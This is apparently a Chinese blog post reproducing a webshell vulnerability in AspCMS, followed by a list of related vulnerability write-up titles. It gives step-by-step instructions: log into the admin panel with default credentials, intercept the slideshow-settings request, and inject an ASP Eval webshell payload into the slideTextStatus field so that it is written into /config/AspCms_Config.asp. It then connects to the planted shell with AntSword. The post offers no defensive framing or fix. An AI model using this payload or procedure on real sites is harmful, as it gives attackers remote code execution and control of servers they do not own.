首页 > 系统相关 >aspcms webshell漏洞复现

aspcms webshell漏洞复现

时间:2024-09-14 18:50:43浏览次数:13  
标签:webshell asp admin 访问 点击 复现 aspcms 数据包

1.【ip】/admin_aspcms/login.asp访问后台,admin 123456 登录

2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包

3.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件

字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a

影响文件
/config/AspCms_Config.asp

4.蚁剑连接

标签:webshell,asp,admin,访问,点击,复现,aspcms,数据包
From: https://blog.csdn.net/shw_yzh/article/details/142264695

相关文章

  • 论文复现--基于LeNet网络结构的数字识别
    前言一直就听说学习深度学习无非就是看论文,然后复现,不断循环,这段时间也看了好几篇论文(虽然都是简单的),但是对于我一个人自学,复现成功,我感觉还是挺开心的本人初学看论文的思路:聚焦网络结构与其实验的效果LeNet虽然简单,很老了,但是毕竟经典,对于初学的的我来说,我感觉还是很......
  • 【漏洞复现】NUUO网络视频录像机 css_parser.php 任意文件读取
            NUUO网络视频录像机(NetworkVideoRecorder,简称NVR)是NUUOInc.生产的一种专业视频监控设备,它广泛应用于零售、交通、教育、政府和银行等多个领域。能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能。它采用先进的视频处理技术,提供高清、流畅......
  • fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
    1.准备:1.1复现环境漏洞环境:vulnhub靶场工具准备:jdk8,apache-maven-3.9.9,kali2024.1,MarshalSec1.2环境启动进入vulnhub目录下的fastjson目录,进入CVE-2017-18349目录cd/home/hbesljx/vulhub/fastjson/1.2.24-rcedocker-compoe启动漏洞环境docker-composeup-d访问靶机......
  • Goby 漏洞发布|(CVE-2024-45195)Apache OFBiz /viewdatafile 代码执行漏洞【已复现】
    漏洞名称:ApacheOFBiz/viewdatafile代码执行漏洞(CVE-2024-45195)EnglishName:ApacheOFBiz/viewdatafileCodeExecutionVulnerability(CVE-2024-45195)CVSScore: 8.0漏洞描述:ApacheOFBiz是一个开源企业资源规划(ERP)系统。它提供了一套企业应用程序,集成并自动化企业的......
  • DenseFusion复现
    试了一下原版的pytorch1.0.0,可能时间太长了,许多版本都不被支持,没弄成,另找到一个项目适配pytorch1.7.1租云服务器。配置RTX3090pytorch1.7使用termius远程连接服务器gitclone拉取代码,原仓库的download.sh不能用,只好将数据下载到本地,再传到云上,使用scp-rP33287~/DenseFu......
  • 【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE
    免责声明:        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规......
  • 【漏洞复现】用友 U8CRM /pub/help.php 任意文件读取漏洞
    免责声明:        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规......
  • 【漏洞复现】易天智能eHR CreateUser 存在任意用户添加漏洞
    》》》漏洞描述《《《       易天智能eHR管理平台是一款功能全面、智能化的人力资源管理软件,旨在帮助企业提高人力资源管理效率和管理水平。该平台通过集成员工信息、薪酬管理、档案人事管理、绩效管理和招聘管理等多个模块,实现了人力资源管理的全面智能化管理。  ......
  • 羊城杯比赛pwn复现
    title:羊城杯比赛pwn复现date:2024-09-0520:12:19categories:ctf-比赛复现首先推荐这个博客本篇学习的思路来自这个大佬实力有限,只复现出了pstack这一题pstack知识点这个题目是个很经典的栈迁移的题目,因为栈溢出的空间不够,但是常规的栈迁移一般有方法获得一......
  • ConFuzzius复现过程
    模糊测试:ConFuzzius:Adatadependency-awarehybridfuzzerforEthereumsmartcontracts1.安装系统依赖1.1更新系统包首先,更新系统包管理器的索引:输入指令:sudoapt-getupdate安装Python3.8Ubuntu18.04默认没有Python3.8,需要手动添加存储库并安装:sudoadd-ap......